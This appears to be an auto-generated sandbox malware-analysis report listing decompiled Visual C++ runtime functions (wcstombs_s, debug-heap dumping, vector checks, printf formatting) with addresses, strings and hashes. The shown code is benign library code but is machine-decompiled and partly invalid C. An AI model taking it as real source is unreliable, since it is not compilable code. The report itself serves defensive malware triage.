						E0040C660(_t60, _t65, _t80, _t81, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
						_t45 = 0x22;
						goto L30;
					}
				}
				if( *(_t82 + 0xc) != 0) {
					 *( *(_t82 + 0xc)) = 0;
					if( *(_t82 + 0x10) != 0xffffffff &&  *(_t82 + 0x10) != 0x7fffffff &&  *(_t82 + 0x10) > 1) {
						_t94 =  *0x4bb4dc -  *(_t82 + 0x10) - 1; // 0xffffffff
						if(_t94 >= 0) {
							_t79 =  *(_t82 + 0x10) - 1;
							__eflags = _t79;
							 *(_t82 - 0x28) = _t79;
						} else {
							_t69 =  *0x4bb4dc; // 0xffffffff
							 *(_t82 - 0x28) = _t69;
						}
						_t61 =  *(_t82 + 0xc) + 1;
						E004116E0(_t80,  *(_t82 + 0xc) + 1, 0xfe,  *(_t82 - 0x28));
					}
				}
				_t45 =  *((intOrPtr*)(L00411810(_t61)));
				goto L30;
			}

0x0041e014
0x0041e017
0x0041e01e
0x0041e08a
0x0041e08d
0x0041e090
0x0041e094
0x0041e181
0x0041e181
0x0041e185
0x0041e18d
0x0041e18d
0x0041e18f
0x0041e192
0x0041e195
0x0041e195
0x0041e09d
0x0041e0a0
0x0041e177
0x0041e17a
0x0041e17a
0x0041e17d
0x00000000
0x0041e17d
0x0041e0a6
0x0041e0aa
0x0041e16a
0x0041e16d
0x0041e170
0x00000000
0x0041e170
0x0041e0b3
0x0041e0b6
0x0041e0ba
0x0041e0bc
0x0041e0c3
0x0041e0c5
0x0041e0c9
0x0041e0d1
0x0041e0d7
0x0041e0e6
0x0041e0e6
0x0041e0e9
0x0041e0d9
0x0041e0d9
0x0041e0de
0x0041e0de
0x0041e0ec
0x0041e0f8
0x0041e0f8
0x0041e0fc
0x0041e101
0x0041e101
0x0041e0c9
0x0041e0c3
0x0041e104
0x0041e107
0x0041e10a
0x0041e10e
0x0041e111
0x0041e113
0x0041e118
0x0041e11a
0x0041e11f
0x0041e124
0x0041e126
0x0041e12b
0x0041e12e
0x0041e131
0x0041e133
0x0041e133
0x0041e131
0x0041e134
0x0041e138
0x00000000
0x0041e13a
0x0041e13f
0x0041e15b
0x0041e163
0x00000000
0x0041e163
0x0041e138
0x0041e024
0x0041e029
0x0041e030
0x0041e047
0x0041e04d
0x0041e05d
0x0041e05d
0x0041e060
0x0041e04f
0x0041e04f
0x0041e055
0x0041e055
0x0041e06f
0x0041e073
0x0041e078
0x0041e030
0x0041e080
0x00000000

APIs

_memset.LIBCMT ref: 0041E073
_memset.LIBCMT ref: 0041E0FC
__invalid_parameter.LIBCMTD ref: 0041E15B

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0041E11F, 0041E14C
sizeInBytes > retsize, xrefs: 0041E113, 0041E156
P, xrefs: 0041E170
_wcstombs_s_l, xrefs: 0041E151

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _memset$__invalid_parameter
String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
API String ID: 2178901135-56445615
Opcode ID: 95e5241750eb7095a6bce365845e9e65ad4c81e3b4b8b6b1330f4e76fb2209dd
Instruction ID: 68ffe3d7c3040c098bca97ba1ee24083fba147051a5244609cf32a5f462ba212
Opcode Fuzzy Hash: 95e5241750eb7095a6bce365845e9e65ad4c81e3b4b8b6b1330f4e76fb2209dd
Instruction Fuzzy Hash: A8417838E00249EBCB14CF5AC885BEE7761FB44315F14C62AEC252A3D1C3B99991CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004106E7 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004106E7() {
				intOrPtr _t54;
				void* _t61;
				intOrPtr _t68;
				void* _t70;
				void* _t98;
				void* _t99;
				signed int _t100;
				void* _t102;
				void* _t105;

				L0:
				while(1) {
					L0:
					 *(_t100 - 4) =  *(_t100 - 4) + 1;
					if( *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc)) + 0x10)) >= 0x10) {
						 *((intOrPtr*)(_t100 - 0x6c)) = 0x10;
					} else {
						_t6 =  *((intOrPtr*)(_t100 + 0xc)) + 0x10; // 0x2
						 *((intOrPtr*)(_t100 - 0x6c)) =  *_t6;
					}
					if( *(_t100 - 4) >=  *((intOrPtr*)(_t100 - 0x6c))) {
						break;
					}
					L5:
					 *(_t100 - 0x61) =  *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc)) +  *(_t100 - 4) + 0x20));
					if(E004103A0(_t100 - 0x60) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t100 - 0x60))) + 0xac)) <= 1) {
						_t54 = E0041BAC0(E004103A0(_t100 - 0x60),  *(_t100 - 0x61) & 0x000000ff, 0x157);
						_t105 = _t102 + 0xc;
						 *((intOrPtr*)(_t100 - 0x70)) = _t54;
					} else {
						_t68 = E0041BB70( *(_t100 - 0x61) & 0x000000ff, 0x157, E004103A0(_t100 - 0x60));
						_t105 = _t102 + 0xc;
						 *((intOrPtr*)(_t100 - 0x70)) = _t68;
					}
					if( *((intOrPtr*)(_t100 - 0x70)) == 0) {
						 *(_t100 - 0x74) = 0x20;
					} else {
						 *(_t100 - 0x74) =  *(_t100 - 0x61) & 0x000000ff;
					}
					 *((char*)(_t100 +  *(_t100 - 4) - 0x50)) =  *(_t100 - 0x74);
					 *((intOrPtr*)(_t100 - 0x68)) =  *((intOrPtr*)(L00411810( *(_t100 - 0x74))));
					 *((intOrPtr*)(L00411810( *(_t100 - 0x74)))) = 0;
					_t84 = _t100 +  *(_t100 - 4) * 3 - 0x3c;
					_t61 = E0041BA60(_t100 +  *(_t100 - 4) * 3 - 0x3c, _t100 +  *(_t100 - 4) * 3 - 0x3c, 0x31 -  *(_t100 - 4) * 3, "%.2X ",  *(_t100 - 0x61) & 0x000000ff);
					_t102 = _t105 + 0x10;
					if(_t61 < 0) {
						E0040CCC0( *((intOrPtr*)(L00411810(_t84))), 0x16, 0x22, L"(*_errno())", L"_printMemBlockData", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x963, 0);
						_t102 = _t102 + 0x20;
					}
					 *((intOrPtr*)(L00411810(_t84))) =  *((intOrPtr*)(_t100 - 0x68));
				}
				L15:
				_t91 =  *(_t100 - 4);
				 *((char*)(_t100 +  *(_t100 - 4) - 0x50)) = 0;
				_push(_t100 - 0x3c);
				if(L00418C90(0, 0, 0, 0, " Data: <%s> %s\n", _t100 - 0x50) == 1) {
					asm("int3");
				}
				return E00410900(E00410370(_t100 - 0x60), _t70,  *(_t100 - 8) ^ _t100, _t91, _t98, _t99);
			}

0x004106e7
0x004106e7
0x004106e7
0x004106ed
0x004106f7
0x00410704
0x004106f9
0x004106fc
0x004106ff
0x004106ff
0x00410711
0x00000000
0x00000000
0x00410717
0x00410720
0x0041072d
0x00410775
0x0041077a
0x0041077d
0x00410742
0x00410755
0x0041075a
0x0041075d
0x0041075d
0x00410784
0x0041078f
0x00410786
0x0041078a
0x0041078a
0x0041079c
0x004107a7
0x004107af
0x004107d3
0x004107d8
0x004107dd
0x004107e2
0x00410806
0x0041080b
0x0041080b
0x00410816
0x00410816
0x0041081d
0x0041081d
0x00410820
0x00410828
0x00410845
0x00410847
0x00410847
0x0041085d

APIs

__isctype_l.LIBCMTD ref: 00410755
_swprintf_s.LIBCMTD ref: 004107D8
__invoke_watson_if_oneof.LIBCMTD ref: 00410806

Strings

(*_errno()), xrefs: 004107F5
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 004107EB
%.2X , xrefs: 004107BA
_printMemBlockData, xrefs: 004107F0

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invoke_watson_if_oneof__isctype_l_swprintf_s
String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
API String ID: 4289034949-3158630120
Opcode ID: bf52b96a6561e53c154466f0891f2b064e31a8753072260a3aede77616512558
Instruction ID: 070bcb8bc2bf42c1a95b15c296b94cd6d269a0fe5aaf6d158efd0e8a71443d59
Opcode Fuzzy Hash: bf52b96a6561e53c154466f0891f2b064e31a8753072260a3aede77616512558
Instruction Fuzzy Hash: 62319274A04308DFDB04EBA1C951AEDB771AF45304F20856AE4156F2C2D7789A81DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00415931 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69fileCOMMON

Download Yara Rule

APIs

__set_error_mode.LIBCMTD ref: 00415998
__set_error_mode.LIBCMTD ref: 004159A7
GetStdHandle.KERNEL32(000000F4), ref: 004159BE
_strlen.LIBCMT ref: 004159E4
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 004159FC

Strings

jjj, xrefs: 00415980
t/j, xrefs: 004159D1

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __set_error_mode$FileHandleWrite_strlen
String ID: jjj$t/j
API String ID: 1121076223-194299851
Opcode ID: 59696d17a82b2e4d9de7b591b9dc437e41567369c96365b578ba9219d42105fc
Instruction ID: 67178c7e43af71b7cb917d9b222cc0f193731dcc96f1b3fc111e2d53664aac99
Opcode Fuzzy Hash: 59696d17a82b2e4d9de7b591b9dc437e41567369c96365b578ba9219d42105fc
Instruction Fuzzy Hash: AE21F8B0910108FBDB24DB48D955BED3374EB84314F10826AE40556391D3B99EE0DF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A842 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040A842(intOrPtr* __ecx, intOrPtr* _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t6;
				void* _t8;

				_t7 = __ecx;
				_t2 =  *__ecx;
				if(_t2 == 0) {
					L2:
					_t12 = L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector";
					E0040BB90(L"vector iterators incompatible", L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector", 0xfb);
					if(L0040C820(2, L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector", 0xfc, 0, L"(\"Standard C++ Libraries Invalid Argument\", 0)", _t8) == 1) {
						asm("int3");
					}
					return E0040C660(_t6, _t7, 0xfc, _t12, L"\"invalid argument\"", L"std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Compat", _t12, 0xfc, 0);
				}
				_t7 = _a4;
				if(_t2 !=  *_a4) {
					goto L2;
				}
				return _t2;
			}

0x0040a842
0x0040a845
0x0040a849
0x0040a852
0x0040a859
0x0040a864
0x0040a884
0x0040a886
0x0040a886
0x00000000
0x0040a89e
0x0040a84b
0x0040a850
0x00000000
0x00000000
0x0040a8a0

APIs

std::_Debug_message.LIBCPMTD ref: 0040A864
__invalid_parameter.LIBCMTD ref: 0040A895

Strings

"invalid argument", xrefs: 0040A890
std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::all, xrefs: 0040A88B
vector iterators incompatible, xrefs: 0040A85F
("Standard C++ Libraries Invalid Argument", 0), xrefs: 0040A869
C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector, xrefs: 0040A859, 0040A85E, 0040A876, 0040A88A

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Debug_message__invalid_parameterstd::_
String ID: "invalid argument"$("Standard C++ Libraries Invalid Argument", 0)$C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector$std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::all$vector iterators incompatible
API String ID: 2521103567-497709622
Opcode ID: 75c41e03dc1d73b63e8e422a03f9e18b82f026b430830505048c8afc50c666ec
Instruction ID: 8c2b323eeed5b8123932a4cda06973bb3678cade3ebc50025cb0fb81ffc46a62
Opcode Fuzzy Hash: 75c41e03dc1d73b63e8e422a03f9e18b82f026b430830505048c8afc50c666ec
Instruction Fuzzy Hash: 64F0897278031472D53071575C57F573A18C781B94F28403BF608755D1D679A851C1FD

Uniqueness

Uniqueness Score: -1.00%

Function 004224F7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004224F7() {
				signed int _t499;
				void* _t504;
				signed int _t506;
				void* _t526;
				void* _t528;
				signed int _t536;
				void* _t555;
				void* _t556;
				signed int _t557;
				void* _t559;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t557 - 0x260)) = 0x27;
					while(1) {
						L148:
						 *(__ebp - 8) = 0x10;
						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
						__eflags =  *(__ebp - 0x10) & 0x00000080;
						if(( *(__ebp - 0x10) & 0x00000080) != 0) {
							 *(__ebp - 0x14) = 0x30;
							 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
							__eflags =  *(__ebp - 0x260) + 0x51;
							 *((char*)(__ebp - 0x13)) = __al;
							 *(__ebp - 0x1c) = 2;
						}
						while(1) {
							L153:
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
							__eflags =  *(__ebp - 0x10) & 0x00008000;
							if(( *(__ebp - 0x10) & 0x00008000) == 0) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
								__eflags =  *(__ebp - 0x10) & 0x00001000;
								if(( *(__ebp - 0x10) & 0x00001000) == 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
									__eflags =  *(__ebp - 0x10) & 0x00000020;
									if(( *(__ebp - 0x10) & 0x00000020) == 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
										__eflags =  *(__ebp - 0x10) & 0x00000040;
										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
											__ecx = __ebp + 0x14;
											__eax = E0041F270(__ebp + 0x14);
											__edx = 0;
											__eflags = 0;
											 *(__ebp - 0x2b8) = __eax;
											 *(__ebp - 0x2b4) = 0;
										} else {
											__eax = __ebp + 0x14;
											__eax = E0041F270(__ebp + 0x14);
											asm("cdq");
											 *(__ebp - 0x2b8) = __eax;
											 *(__ebp - 0x2b4) = __edx;
										}
									} else {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
										__eflags =  *(__ebp - 0x10) & 0x00000040;
										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
											__ecx = __ebp + 0x14;
											E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
											asm("cdq");
											 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
											 *(__ebp - 0x2b4) = __edx;
										} else {
											__eax = __ebp + 0x14;
											__eax = E0041F270(__ebp + 0x14);
											__ax = __eax;
											asm("cdq");
											 *(__ebp - 0x2b8) = __eax;
											 *(__ebp - 0x2b4) = __edx;
										}
									}
								} else {
									__eax = __ebp + 0x14;
									 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
									 *(__ebp - 0x2b4) = __edx;
								}
							} else {
								__ecx = __ebp + 0x14;
								 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
								 *(__ebp - 0x2b4) = __edx;
							}
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
							__eflags =  *(__ebp - 0x10) & 0x00000040;
							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
								goto L170;
							}
							L166:
							__eflags =  *(__ebp - 0x2b4);
							if(__eflags > 0) {
								goto L170;
							}
							L167:
							if(__eflags < 0) {
								L169:
								 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
								__edx =  *(__ebp - 0x2b4);
								asm("adc edx, 0x0");
								__edx =  ~( *(__ebp - 0x2b4));
								 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
								 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
								L171:
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
								__eflags =  *(__ebp - 0x10) & 0x00008000;
								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
									__eflags =  *(__ebp - 0x10) & 0x00001000;
									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
										__edx =  *(__ebp - 0x2c0);
										__eax =  *(__ebp - 0x2bc);
										__eax =  *(__ebp - 0x2bc) & 0x00000000;
										__eflags = __eax;
										 *(__ebp - 0x2bc) = __eax;
									}
								}
								__eflags =  *(__ebp - 0x30);
								if( *(__ebp - 0x30) >= 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
									__eflags =  *(__ebp - 0x30) - 0x200;
									if( *(__ebp - 0x30) > 0x200) {
										 *(__ebp - 0x30) = 0x200;
									}
								} else {
									 *(__ebp - 0x30) = 1;
								}
								 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
								__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
								if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
									 *(__ebp - 0x1c) = 0;
								}
								__eax = __ebp - 0x49;
								 *(__ebp - 4) = __ebp - 0x49;
								while(1) {
									L181:
									__ecx =  *(__ebp - 0x30);
									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
									__eflags =  *(__ebp - 0x30);
									if( *(__ebp - 0x30) > 0) {
										goto L183;
									}
									L182:
									 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
									__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
									if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
										L186:
										__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
										 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
										__ecx =  *(__ebp - 4);
										__ecx =  *(__ebp - 4) + 1;
										 *(__ebp - 4) = __ecx;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
										__eflags =  *(__ebp - 0x10) & 0x00000200;
										if(( *(__ebp - 0x10) & 0x00000200) == 0) {
											while(1) {
												L190:
												__eflags =  *(__ebp - 0x28);
												if( *(__ebp - 0x28) != 0) {
													goto L216;
												}
												L191:
												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
												__eflags =  *(__ebp - 0x10) & 0x00000040;
												if(( *(__ebp - 0x10) & 0x00000040) != 0) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
													__eflags =  *(__ebp - 0x10) & 0x00000100;
													if(( *(__ebp - 0x10) & 0x00000100) == 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
														__eflags =  *(__ebp - 0x10) & 0x00000001;
														if(( *(__ebp - 0x10) & 0x00000001) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
															__eflags =  *(__ebp - 0x10) & 0x00000002;
															if(( *(__ebp - 0x10) & 0x00000002) != 0) {
																 *(__ebp - 0x14) = 0x20;
																 *(__ebp - 0x1c) = 1;
															}
														} else {
															 *(__ebp - 0x14) = 0x2b;
															 *(__ebp - 0x1c) = 1;
														}
													} else {
														 *(__ebp - 0x14) = 0x2d;
														 *(__ebp - 0x1c) = 1;
													}
												}
												 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
												 *(__ebp - 0x2c4) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
												__eflags =  *(__ebp - 0x10) & 0x0000000c;
												if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
													__edx = __ebp - 0x24c;
													__eax =  *(__ebp + 8);
													__ecx =  *(__ebp - 0x2c4);
													__eax = E00422C60(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
												}
												__edx = __ebp - 0x24c;
												__eax =  *(__ebp + 8);
												__ecx =  *(__ebp - 0x1c);
												__edx = __ebp - 0x14;
												E00422CA0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x24c) =  *(__ebp - 0x10);
												__eax =  *(__ebp - 0x10) & 0x00000008;
												__eflags =  *(__ebp - 0x10) & 0x00000008;
												if(( *(__ebp - 0x10) & 0x00000008) != 0) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
													__eflags =  *(__ebp - 0x10) & 0x00000004;
													if(( *(__ebp - 0x10) & 0x00000004) == 0) {
														__edx = __ebp - 0x24c;
														__eax =  *(__ebp + 8);
														__ecx =  *(__ebp - 0x2c4);
														__eax = E00422C60(0x30,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
													}
												}
												__eflags =  *(__ebp - 0xc);
												if( *(__ebp - 0xc) == 0) {
													L212:
													__ecx = __ebp - 0x24c;
													__edx =  *(__ebp + 8);
													__eax =  *(__ebp - 0x24);
													__ecx =  *(__ebp - 4);
													__eax = E00422CA0(__ecx, __ecx,  *(__ebp - 0x24),  *(__ebp + 8), __ebp - 0x24c);
													goto L213;
												} else {
													L204:
													__eflags =  *(__ebp - 0x24);
													if( *(__ebp - 0x24) <= 0) {
														goto L212;
													}
													L205:
													 *(__ebp - 0x2dc) = 0;
													__edx =  *(__ebp - 4);
													 *(__ebp - 0x2c8) =  *(__ebp - 4);
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x2cc) =  *(__ebp - 0x24);
													while(1) {
														L206:
														__ecx =  *(__ebp - 0x2cc);
														 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
														 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
														__eflags = __ecx;
														if(__ecx == 0) {
															break;
														}
														L207:
														__eax =  *(__ebp - 0x2c8);
														 *(__ebp - 0x32e) =  *( *(__ebp - 0x2c8));
														__edx =  *(__ebp - 0x32e) & 0x0000ffff;
														__eax = __ebp - 0x2d8;
														__ecx = __ebp - 0x2d0;
														 *(__ebp - 0x2dc) = E00424E90(__ebp - 0x2d0, __ebp - 0x2d8, 6,  *(__ebp - 0x32e) & 0x0000ffff);
														 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
														 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
														__eflags =  *(__ebp - 0x2dc);
														if( *(__ebp - 0x2dc) != 0) {
															L209:
															 *(__ebp - 0x24c) = 0xffffffff;
															break;
														}
														L208:
														__eflags =  *(__ebp - 0x2d0);
														if( *(__ebp - 0x2d0) != 0) {
															L210:
															__eax = __ebp - 0x24c;
															__ecx =  *(__ebp + 8);
															__edx =  *(__ebp - 0x2d0);
															__ebp - 0x2d8 = E00422CA0( *(__ebp + 8), __ebp - 0x2d8,  *(__ebp - 0x2d0),  *(__ebp + 8), __ebp - 0x24c);
															continue;
														}
														goto L209;
													}
													L211:
													L213:
													__eflags =  *(__ebp - 0x24c);
													if( *(__ebp - 0x24c) >= 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
														__eflags =  *(__ebp - 0x10) & 0x00000004;
														if(( *(__ebp - 0x10) & 0x00000004) != 0) {
															__eax = __ebp - 0x24c;
															__ecx =  *(__ebp + 8);
															__edx =  *(__ebp - 0x2c4);
															__eax = E00422C60(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
														}
													}
												}
												L216:
												__eflags =  *(__ebp - 0x20);
												if( *(__ebp - 0x20) != 0) {
													 *(__ebp - 0x20) = L0040F230( *(__ebp - 0x20), 2);
													 *(__ebp - 0x20) = 0;
												}
												while(1) {
													L218:
													 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
													_t547 =  *(_t557 - 0x251);
													 *(_t557 + 0xc) =  *(_t557 + 0xc) + 1;
													if( *(_t557 - 0x251) == 0 ||  *(_t557 - 0x24c) < 0) {
														break;
													} else {
														if( *(_t557 - 0x251) < 0x20 ||  *(_t557 - 0x251) > 0x78) {
															 *(_t557 - 0x310) = 0;
														} else {
															 *(_t557 - 0x310) =  *( *(_t557 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
														}
													}
													L7:
													 *(_t557 - 0x250) =  *(_t557 - 0x310);
													_t506 =  *(_t557 - 0x250) * 9;
													_t536 =  *(_t557 - 0x25c);
													_t547 = ( *(_t506 + _t536 + 0x4081a0) & 0x000000ff) >> 4;
													 *(_t557 - 0x25c) = ( *(_t506 + _t536 + 0x4081a0) & 0x000000ff) >> 4;
													if( *(_t557 - 0x25c) != 8) {
														L16:
														 *(_t557 - 0x318) =  *(_t557 - 0x25c);
														__eflags =  *(_t557 - 0x318) - 7;
														if( *(_t557 - 0x318) > 7) {
															continue;
														}
														L17:
														switch( *((intOrPtr*)( *(_t557 - 0x318) * 4 +  &M00422AB0))) {
															case 0:
																L18:
																 *(_t557 - 0xc) = 0;
																_t509 = E00420DA0( *(_t557 - 0x251) & 0x000000ff, E004103A0(_t557 - 0x40));
																_t562 = _t559 + 8;
																__eflags = _t509;
																if(_t509 == 0) {
																	L24:
																	E00422BC0( *(_t557 - 0x251) & 0x000000ff,  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
																	_t559 = _t562 + 0xc;
																	goto L218;
																} else {
																	E00422BC0( *((intOrPtr*)(_t557 + 8)),  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
																	_t562 = _t562 + 0xc;
																	_t541 =  *( *(_t557 + 0xc));
																	 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
																	_t547 =  *(_t557 + 0xc) + 1;
																	__eflags = _t547;
																	 *(_t557 + 0xc) = _t547;
																	asm("sbb eax, eax");
																	 *(_t557 - 0x27c) =  ~( ~( *(_t557 - 0x251)));
																	if(_t547 == 0) {
																		_push(L"(ch != _T(\'\\0\'))");
																		_push(0);
																		_push(0x486);
																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																		_push(2);
																		_t521 = L0040C820();
																		_t562 = _t562 + 0x14;
																		__eflags = _t521 - 1;
																		if(_t521 == 1) {
